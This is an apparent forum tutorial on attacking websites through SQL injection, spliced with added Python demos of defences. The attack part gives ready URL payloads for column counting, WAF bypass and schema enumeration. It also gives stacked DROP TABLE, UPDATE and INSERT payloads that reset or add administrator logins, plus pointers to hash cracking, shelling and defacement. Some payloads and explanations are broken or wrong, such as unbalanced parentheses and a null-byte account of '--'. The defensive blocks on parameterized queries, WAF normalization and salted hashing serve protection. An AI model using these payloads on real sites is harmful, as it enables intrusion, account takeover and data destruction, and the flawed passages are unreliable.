Today I'll write a tutorial that covers the most common problems you run into while doing SQL injection, and the solutions to them. Everyone who has looked at tutorials on hacking a website has noticed that there are far too many SQL injection tutorials. Almost every forum has ten of them and every blog has five, but most of them are copied from somewhere else and the author often doesn't even know why SQL injection works. All of those tutorials read like textbooks reciting their ABCs, and the result is just a mess. Everyone writes tutorials about SQL injection, but nobody covers the problems that come with the attack.
What is the cause of most problems related to SQL injection?
Web developers aren't always dumb: they have also heard of hackers and have implemented security measures such as a WAF or manual protection. A WAF is a web application firewall and will block malicious requests, but WAFs are quite easy to bypass. Nobody wants their site hacked, so site owners implement some security, but of course it would be wrong to say that if we fail then it's the server's fault. There's also a good chance that we're injecting in a different way than we should.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
If you're interested in WAFs and how they work, then I suggest reading about them on Wikipedia:
http://en.wikipedia.org/wiki/Application_firewall
Order by is being blocked?
It rarely happens, but sometimes you can't use ORDER BY because the WAF has blocked it, or for some other reason. Unfortunately we can't skip the ORDER BY step, so we have to find another way. The way is simple: instead of ORDER BY we use GROUP BY, because that is very unlikely to be blacklisted by the WAF.
If the request below returns 'forbidden', then it is blocked:
http://site.com/gallery?id=1 order by 100--
Then you have to try GROUP BY instead, and it will return correctly:
http://site.com/gallery?id=1 group by 100-- / success
There's still a possibility that the WAF will block the request, but there's one more way, and it's not very widely known. It uses ( the main query ) = (select 1):
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably receive an error like this:
Operand should contain 5 column(s).
That error means there are 5 columns, so we can proceed to the next step, which is union select. The command was different from usual, but the rest of the injection is the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--
'order by 10000' and still no error?
This is a small chapter where I'll tell you why sometimes ORDER BY won't work and you don't see an error. The difference between this chapter and the last one is that previously your requests were blocked by the WAF, while here the injection method is just a little bit different. When I saw it for the first time I wondered how a database could have 100000 columns, because I wasn't getting the error even though the site was vulnerable.
The answer is quite logical. We're not getting an error from order by 1000000 because there are that many columns; we're not getting it because our injection isn't working.
Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
To bypass this you just have to change the URL a little bit: add ' after the ID number and + at the end.
Example :
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example works for you, then you have to use it in the next steps as well. There isn't anything complicated, but to make everything clear I'll still give an example.
http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+
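To show why the quoted form matters, here is an added Python example (mine, not from the original tutorial) that uses an in-memory SQLite table as a stand-in for the site's database. The table layout, the row and the function names are assumptions. It compares a numeric context (WHERE id = 9 ...) with a string context (WHERE id = '9' ...): the same ORDER BY probe produces no error in the string context until the quote is closed and the rest commented out, and produces no error at all when the value is bound as a parameter, which is the fix a developer should apply.

```python
import sqlite3

# Constructed stand-in for the site's "news" table (assumption: three columns).
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO news VALUES (9, 'Hello', 'first article');
"""


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def run_concatenated(con, id_value, quoted):
    """Vulnerable pattern: the request parameter is pasted into the SQL text.

    quoted=False models   WHERE id = 9 ...    (numeric context)
    quoted=True  models   WHERE id = '9' ...  (string context)
    Returns "no error" or the database's error text, which is exactly what
    an error-based probe reads off the page.
    """
    if quoted:
        sql = f"SELECT * FROM news WHERE id = '{id_value}'"
    else:
        sql = f"SELECT * FROM news WHERE id = {id_value}"
    try:
        con.execute(sql).fetchall()
        return "no error"
    except sqlite3.Error as exc:
        return f"error: {exc}"


def run_parameterized(con, id_value):
    """Hardened pattern: the value is bound as data and never parsed as SQL."""
    try:
        con.execute("SELECT * FROM news WHERE id = ?", (id_value,)).fetchall()
        return "no error"
    except sqlite3.Error as exc:
        return f"error: {exc}"


def demo():
    con = fresh_db()
    return {
        # numeric context: ORDER BY 3 fits the three columns, ORDER BY 4 does not,
        # and the error text is what leaks the column count
        "numeric_ok": run_concatenated(con, "9 order by 3", quoted=False),
        "numeric_fail": run_concatenated(con, "9 order by 4", quoted=False),
        # string context: the whole payload stays inside the quotes, so no error,
        # which is the "order by 10000 and still no error" case
        "quoted_no_break": run_concatenated(con, "9 order by 100", quoted=True),
        # closing the quote and commenting out the trailing quote (the  '...--+  form)
        # lets the probe reach the parser again
        "quoted_break": run_concatenated(con, "9' order by 100--", quoted=True),
        # bound parameter: the payload is compared as a plain string, nothing breaks
        "parameterized": run_parameterized(con, "9' order by 100--"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:16} {outcome}")
```

The application-side lesson is the last line of demo(): with a bound parameter the database never sees ORDER BY, so there is no column count to leak and no error text to read, regardless of how the request is quoted.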
Extracting data from other databases.
Sometimes we can inject successfully and no error appears; it's a hacker's dream. That dream ends the moment we see that there's nothing useful to us. There are only a few tables, called "News", "gallery" and "articles". They aren't useful to us at all, because we'd like to see tables like "Admin" or "Administrator". Still, we know that the server probably has several databases, and even if we have found the information we're looking for, you should still take a look in the other databases as well.
This will give you the schema names.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
And with this code you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x
This code will give you the column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x
I get an error if I try to extract tables.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables
The following error appears:
"you have an error in your sql syntax near '' at line 1"
Change the URL to this:
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--
How to bypass WAF/Web application firewall
The biggest reason why most errors appear is the security measures added to the server, and the WAF is the biggest one of them, but mostly they're built really badly and can be bypassed really easily. Mostly you will get a 404 error like the one below; this is the WAF. People who are into SQL injection and bypassing WAFs are probably thinking right now "Dude, only one bypassing method?", but we both know that bypassing WAFs is a different kind of science and I could write an ebook on it. I'll keep all those bypassing queries for another time and won't cover them here.
"404 forbidden you do not have permission to access to this webpage"
The request will look like this if you get the error:
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]
Change the URL like below:
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]
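As an added example (mine, not the tutorial's), here is the defender's side of the inline-comment trick shown above. A naive blacklist that only URL-decodes the query and looks for the words "union select" misses the /*!UnIoN*/ form; a rule that first normalizes the request the way the MySQL parser will read it (ordinary comments dropped, the body of /*!...*/ version comments kept, case folded, whitespace collapsed) catches both forms. The sample query strings are constructed; the function names are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample query strings: the first two copy the shapes shown in the
# text, the third is ordinary traffic that happens to contain the word "union".
SAMPLES = {
    "plain": "id=-1+union+select+1,2,3,4,5--",
    "inline_comment": "id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--",
    "benign": "id=12&page=2&sort=union_members",
}

# UNION [ALL] SELECT as whole words, after normalization has made the text plain.
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.IGNORECASE)


def naive_match(query):
    """A blacklist that only decodes the URL and looks for the literal words.
    This is the kind of rule the inline-comment form slips past."""
    return "union select" in unquote_plus(query).lower()


def normalize(query):
    """Bring a query string into the form the database parser will actually see."""
    q = unquote_plus(query)                             # '+' becomes a space, %XX is decoded
    q = re.sub(r"/\*(?!!).*?\*/", " ", q, flags=re.S)  # ordinary /* ... */ comments: MySQL ignores the body
    q = re.sub(r"/\*!\d*", " ", q)                      # /*!12345 ... */ version comments: MySQL executes the body
    q = q.replace("*/", " ")
    return re.sub(r"\s+", " ", q).strip().lower()


def normalized_match(query):
    """Signature check on the normalized text."""
    return UNION_SELECT.search(normalize(query)) is not None


if __name__ == "__main__":
    for name, query in SAMPLES.items():
        print(f"{name:15} naive={naive_match(query)!s:5} normalized={normalized_match(query)}")
```

Signature matching of this kind is always a race against encodings, so it belongs in front of, not instead of, parameterized queries in the application itself.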
Is it possible to modify the information in the database by SQL injection?
Most people aren't aware of it, but it's possible. You're able to UPDATE, DROP, INSERT and SELECT information. Most people dealing with SQL injection have never looked deeper into the attack than the average SQL injection tutorial shows, and the average tutorial doesn't include those statements, most likely because people are copy-pasting tutorials or just rewriting them. You might ask why one should update, drop or insert information into the database if you can just read the existing information and use it; why make another administrator account if one already exists?
Reading the information is just one part of the injection, and sometimes those other, quite infamous commands are more powerful than we thought. If you have read all the available SQL injection tutorials then you're probably aware that you can read the information, but you didn't know you're able to modify it. If you have tried SQL injection then you have probably faced the problem that there is no administrator account; why not use the INSERT command to add one? There is no admin page to log in to; why not drop the table and all its information so nobody can access it? I want to get rid of the current administrator and can't change his password; why not use the UPDATE command to change the administrator's password?
You have probably noticed that I have talked a lot about information you may think you don't need, but it's information you need to learn and understand to become a real hacker, because you have to learn how SQL databases work to figure out how those commands work, and you can't find tutorials about it on the net. It's just like the math you learn in school: if you don't learn it, you'll be in trouble when you grow up.
Theory is almost over, so let's get to the practice.
Let's say that we're visiting this page and it's vulnerable to SQL injection.
http://site.com/news.php?id=1
You have to start injecting to look at the tables and the columns in them, but let's assume that the current table is named "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information in the database. SELECT is probably already covered in all the tutorials, so let's focus on the other three. Let's start with the DROP command.
I'd like to get rid of a table, how do I do it?
http://site.com/news.php?id=1; DROP TABLE news
That seems easy: we have just dropped the table. I'd explain what we did in the above statement, but it's hard to explain because you can all understand the command. Unfortunately most 'hackers' who make tutorials on SQL injection aren't aware of it, and sometimes those three words are more important than all the information we can read in some tutorials.
Let's head to the next statement, which is UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'--
The above template might be confusing, so I'll add a query that you're most likely to use in real life:
http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--
We have just updated the administrator account's password. In the above example we updated 'admin_login' and set the password to "Crackhackforum" for the account whose username is Rynaldo. It's a bit heavy to explain, but I hope you'll understand.
How does INSERT work?
Luckily "INSERT" isn't as easy as the "DROP" statement, but it's still quite understandable. Let's go further with administrator privileges, because that's what most people are heading for. Adding an administrator account would look like this:
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--
INSERT INTO 'admin_login' means that we're inserting something into 'admin_login'. Now we have to tell the database exactly what information we want to add: ('login_id', 'login_name', 'password', 'details') means the fields we're adding to the DB are login_id, login_name, password and details, and those are the pieces of information the database needs to create a new account. So far we have told the database what we want to add: a new account, its password, the account ID and details. Now we have to tell the database what the new account's username, password and account ID will be: VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means the account ID is 2, the username will be Rynaldo and the password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is open the administrator page and log in.
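As an added example (mine, not from the tutorial), the following Python script plays the DROP and UPDATE statements above against an in-memory SQLite database to show what decides whether they run: the page builds its query by pasting the id parameter into the SQL text, and the connection accepts more than one statement per call. The table layout, the rows and the 'site_owner' account are constructed. The hardened lookup binds the id as a parameter, so the same payloads are compared as plain strings and change nothing.

```python
import sqlite3

# Constructed stand-in for the site's database; table and column names follow
# the text's examples, the rows are invented.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO news VALUES (1, 'Welcome');
CREATE TABLE admin_login (login_id INTEGER PRIMARY KEY, login_name TEXT,
                         password TEXT, details TEXT);
INSERT INTO admin_login VALUES (1, 'site_owner', 'ORIGINAL-HASH', 'NA');
"""


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def table_names(con):
    return sorted(r[0] for r in con.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'"))


def admin_password(con):
    return con.execute(
        "SELECT password FROM admin_login WHERE login_name = 'site_owner'").fetchone()[0]


def lookup_stacked(con, id_value):
    """Vulnerable: string concatenation on a connection that runs every statement
    in the string (executescript stands in for a driver or server with
    multi-statement execution switched on). Returns the tables left afterwards."""
    con.executescript(f"SELECT id, title FROM news WHERE id = {id_value}")
    return table_names(con)


def lookup_single(con, id_value):
    """Still concatenating, but through execute(), which in sqlite3 refuses a
    second statement. That is a property of this driver, not a fix."""
    try:
        con.execute(f"SELECT id, title FROM news WHERE id = {id_value}").fetchall()
        return "ran"
    except (sqlite3.ProgrammingError, sqlite3.Warning) as exc:  # older sqlite3 raised Warning
        return f"rejected: {exc}"


def lookup_parameterized(con, id_value):
    """Hardened: the value is bound, so '1; DROP TABLE news' is just a string
    that matches no row. Returns the rows and the tables left afterwards."""
    rows = con.execute("SELECT id, title FROM news WHERE id = ?", (id_value,)).fetchall()
    return rows, table_names(con)


def demo():
    drop_payload = "1; DROP TABLE news"
    update_payload = ("1; UPDATE admin_login SET password = 'attacker-chosen' "
                      "WHERE login_name = 'site_owner'")
    results = {}

    con = fresh_db()
    results["tables_after_stacked_drop"] = lookup_stacked(con, drop_payload)
    con = fresh_db()
    lookup_stacked(con, update_payload)
    results["password_after_stacked_update"] = admin_password(con)

    con = fresh_db()
    results["single_statement"] = lookup_single(con, drop_payload)
    rows, tables = lookup_parameterized(con, drop_payload)
    results["rows_parameterized"] = rows
    results["tables_after_parameterized"] = tables
    lookup_parameterized(con, update_payload)
    results["password_after_parameterized"] = admin_password(con)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:32} {value}")
```

sqlite3's execute() happens to refuse a second statement, which is why lookup_single() reports "rejected"; MySQL with multi-statements enabled and SQL Server do not, so that refusal is not a defense to rely on. Binding the parameter is, and on top of it the application's database account should not hold DROP or UPDATE rights on tables it only ever reads.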
Passwords aren't working
Sometimes the site is vulnerable to SQL injection and you can get the passwords. You find the site's username and password, but when you enter them into the admin panel it shows "Wrong password". This can be because those usernames and passwords are there but aren't working. This is done by the site's admin to confuse you, and actually the control panel doesn't contain any username/password. Sometimes accounts are removed but are still in the database. Sometimes it isn't done by the admin: the credentials have been left in the database after the login page was removed, or the real credentials have been moved to another database and the old entries haven't been deleted.
Sometimes I get some weird password
This weird password is called a hash, and most likely it's an MD5 hash. That means the site's admin has added more security to the website and has encrypted the passwords. The most popular way is the MD5 hash. The best way to crack MD5 hashes is using PasswordsPro or Hashcat, because they're the best and can crack the password even if it's really hard or isn't MD5. You can also use http://md5decrypter.com . I don't like to be a person who nitpicks small details that aren't correct, but here's a tip you should keep in mind. The domain name says "md5decryptor", which refers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash, because hashes are 'one-way' encryption. One-way encryption means it can only be encrypted, not decrypted. Still, that doesn't mean we can't find out what the hash stands for: we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time; they save already-cracked hashes and their results in a database, and if you ask for a hash that's already in their database, you get the result. :)
An MD5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all the hashes that exist and their descriptions here: http://pastebin.com/aiyxhQsf
MD5 hashes can't be decrypted, only cracked
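To make the "hashed, not encrypted" point concrete, here is an added Python example (mine, not from the tutorial). It reproduces the MD5 value the text quotes for 12345 with the standard library, and then shows the storage scheme that defeats the lookup databases described above: a per-user random salt and a slow key-derivation function (PBKDF2-HMAC-SHA256, iteration count my choice), so that two accounts with the same password get different digests and a precomputed table of results is useless. The storage format and function names are mine.

```python
import hashlib
import hmac
import os

# Iteration count is my choice for this example (the cost is deliberate: it is
# what makes offline guessing slow).
ITERATIONS = 600_000


def md5_hex(password):
    """Unsalted MD5, the storage scheme the text describes. Same input, same
    output, for every site and every user, which is what makes lookup sites work."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, slow hash. The returned string carries everything verify needs."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per stored password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def same_password_two_users(password, iterations=ITERATIONS):
    """Two accounts with the same password: identical digests under MD5,
    distinct ones under the salted scheme, so one leaked digest says nothing
    about the other and a precomputed table cannot be reused."""
    return {
        "md5_equal": md5_hex(password) == md5_hex(password),
        "salted_equal": hash_password(password, iterations=iterations)
                        == hash_password(password, iterations=iterations),
    }


if __name__ == "__main__":
    print("md5('12345') =", md5_hex("12345"))
    stored = hash_password("12345")
    print("stored       =", stored)
    print("verify ok    =", verify_password("12345", stored))
    print(same_password_two_users("12345"))
```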
How to find the admin page of a site?
Some sites don't have an admin control panel, and that means you can use any method for finding the admin page, but it doesn't even exist. You might ask "I got the username and password from the database, so why isn't there any admin login page?", but sometimes the credentials were just left in the database after the control panel was removed.
Most people use tools called "admin page finders". They have a list of specific pages and will try each of them. If the page gives HTTP response 200 then it exists, but if the server responds with HTTP 404 then the page doesn't exist. If a page from the list exists, the tool will say "Page found". I don't have any tool to share at the moment, but if you download one yourself then beware, because most of those tools are infected with viruses.
The admin page finders I mentioned above usually don't find the administrator page if it's custom-made or renamed. That means quite often those tools don't help us, and we have to use an alternative; I think the best one is a site crawler. Most of you probably have Acunetix Web Vulnerability Scanner 8, and it has one wonderful feature called the site crawler. It'll show you all the pages on the site and will 100% find the login page if one exists.
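From the defender's side, the behaviour described above (a list of candidate paths tried one after another, each answered with a 404 until one hits) is easy to spot in the access log. This added Python example (mine, not the tutorial's) parses constructed common-log-format lines and flags any client that collects at least five 404 responses within one minute; the threshold, the window and the addresses are my choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log lines in common log format (addresses from the
# documentation ranges, paths invented). 203.0.113.5 is walking a wordlist;
# 198.51.100.7 is ordinary traffic with one stale link.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 404 512
198.51.100.7 - - [10/Oct/2023:13:55:37 +0000] "GET /news.php?id=9 HTTP/1.1" 200 2048
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /administrator HTTP/1.1" 404 512
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /admin.php HTTP/1.1" 404 512
198.51.100.7 - - [10/Oct/2023:13:55:39 +0000] "GET /old-page HTTP/1.1" 404 512
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /cpanel HTTP/1.1" 404 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /login HTTP/1.1" 404 512
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /wp-admin HTTP/1.1" 404 512
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for an unparsable line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])


def find_enumeration(log_text, threshold=5, window=timedelta(minutes=1)):
    """Flag IPs that produce at least `threshold` 404s inside any `window`.
    Returns {ip: [paths in the first window that crossed the threshold]}."""
    misses = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev[3] == 404:
            misses[ev[0]].append((ev[1], ev[2]))

    flagged = {}
    for ip, events in misses.items():
        events.sort()                     # sliding window over time-ordered misses
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = [path for _, path in events[start:end + 1]]
                break
    return flagged


if __name__ == "__main__":
    for ip, paths in find_enumeration(SAMPLE_LOG).items():
        print(ip, "->", paths)
```

The same signal also shows what the tutorial says about renamed panels: a crawler-found page answers 200 once, while a wordlist leaves a trail of misses, and it is the trail that a rate limit or an alert should key on.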
Automated SQL injection tools.
Automated SQL injection tools are programs that will do the whole job for you; sometimes they will even crack the hashes and find the administrator page. Most people use automated SQL injection tools, and the most popular of them are Havij and SQLmap. Havij is used much more than SQLmap, even though the other tool is much better for injection. The sad truth behind that is that many people aren't even able to run SQLmap, and those people are called script-kiddies. Being a script-kiddie is the worst thing you can be in the hacking world, and if you don't learn how to perform the attack manually and only use tools, then you're one of them. If you use those tools to perform the attack then most people will think you're a script-kiddie, because most likely you are. Professionals won't take you seriously if you inject with them, and you won't become a real hacker either. My text above might raise the question "But I've seen that even professional hackers use SQLmap?", and I'd like to say that everything isn't always black and white. If there are 10 databases, 50 tables in them and 100 columns in each table, then it would take days to process all that information. I also sometimes use automated tools because they make my life easier, but to use those tools you first have to learn how to do the work manually, and that's what the tutorial above teaches you.
Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually.
What else can I do with SQL injection besides extracting information?
There are many things besides extracting information from the database, and sometimes they are much more powerful. We said above that sometimes the database doesn't contain the administrator's credentials, or you can't crack the hashes. Then the whole injection seems pointless, because we can't use the information we got from the database. Still, we can use a few other methods. Just as we can conduct a CSRF attack through persistent XSS, we can also move on to other attacks through SQL injection. One option would be performing a DOS attack on the website that is vulnerable to SQL injection. DOS is short for denial of service, and it's totally different from DDOS, which is distributed denial of service. I think you all probably know what these are, but to sum the attack up in a sentence: DOS allows us to take the website down temporarily so users can't access it. The other way would be uploading our shell through SQL injection. If you're wondering what a shell is, in short it's a script that we upload to the server; it creates a backdoor for us and gives us all the privileges to do what we like on the server, and sometimes by uploading a shell you have more rights to modify things than the real administrator has. After you have uploaded a shell you can move on to symlinking, which means we can deface all the sites that share the same server. Shelling the website is probably the most powerful thing you can do to it. I haven't covered how to upload a shell through SQL injection, and haven't covered how to cause a DOS either, but I probably will in my next tutorials, because uploading a shell through SQL is another kind of science, just like bypassing WAFs. Those are the most common methods attackers use after they can't get anything useful out of the database. Of course not every website has the same vulnerabilities, and they don't always respond the way we want; by that I mean we can't perform those attacks on all websites. We have all heard that imagination is unlimited and you can do whatever you'd like. That's kind of true, and hacking isn't an exception; there are more ways than I can count.
What to do if all the information doesn't display on the page?
I have actually very rarely seen so much information on a webpage that it all just doesn't fit, but one person recently asked me that question and I decided to add it here. Also, if you have questions then do ask, and I'll update the article.
Getting back to the question, the answer is simple: if all the information can't fit on the screen then you have to look at the source code, because everything displayed on the webpage will be in there. Also, sometimes the information appears in the tab where the site's name usually is. If you can't see the information then sometimes it's hidden, but by taking a deeper look you might find it in the source. That's why you always have to try all the solutions before quitting, because sometimes you might think "I can't inject into that..", but actually the answer is hidden in the source.
What is the purpose of '--' in union+select+1,2,3,4,5-- ?
I suggest reading about null bytes; here's a good explanation: http://en.wikipedia.org/wiki/Null_character . It might give you a hint why -- is used. Adding -- at the end of the URL isn't always necessary, and it depends on the target. It doesn't have any influence on the injection itself, because it doesn't mean anything by itself, but it's still used because it marks the end of the query. It means that if I'm injecting as http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be read. It's just like masking a shell. Sometimes the injection doesn't work if -- is missing, because -- tells the DB "I'm the end of the query, don't read anything that comes after me and execute everything in front of me". It's just like writing a sentence without a full stop: people might think it's not the end of your sentence and will wait until you write the rest, and the end comes when you add the full stop.
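The behaviour of -- described above, in an added Python example (mine, not the tutorial's) against an in-memory SQLite table with three constructed columns: the same payload once without the terminator, once with it followed by the trailing text from the example, and once in a numeric context where nothing needs to be commented out. The template string and function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the site's "news" table (assumption: three columns).
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO news VALUES (1, 'Hello', 'first article');
"""


def try_query(sql):
    """Run one statement against a fresh in-memory database and report either
    the rows or the parser's complaint, as an error-leaking page would."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    try:
        return "ok", con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)


def build_quoted(id_value):
    """The vulnerable template: the value lands between single quotes, so the
    template itself appends a closing quote after whatever was injected."""
    return f"SELECT id, title, body FROM news WHERE id = '{id_value}'"


def build_numeric(id_value):
    """The same template without quotes: nothing trails the injected value."""
    return f"SELECT id, title, body FROM news WHERE id = {id_value}"


def demo():
    return {
        # without the terminator, the quote appended by the template is left dangling
        "quoted_without_comment": try_query(build_quoted("-1' union select 1,2,3")),
        # with it, everything after -- (the stray text and the quote) is ignored
        "quoted_with_comment": try_query(build_quoted("-1' union select 1,2,3-- asasdasd")),
        # numeric context: no trailing quote exists, so -- is not needed
        "numeric_without_comment": try_query(build_numeric("-1 union select 1,2,3")),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:24} {outcome}")
```

The first result is the "injection isn't working" case: the database never ran the query, it rejected the dangling quote. The third is why the terminator "depends on the target": there was nothing left over to comment out. With a bound parameter neither template is vulnerable, because the value is never parsed as SQL at all.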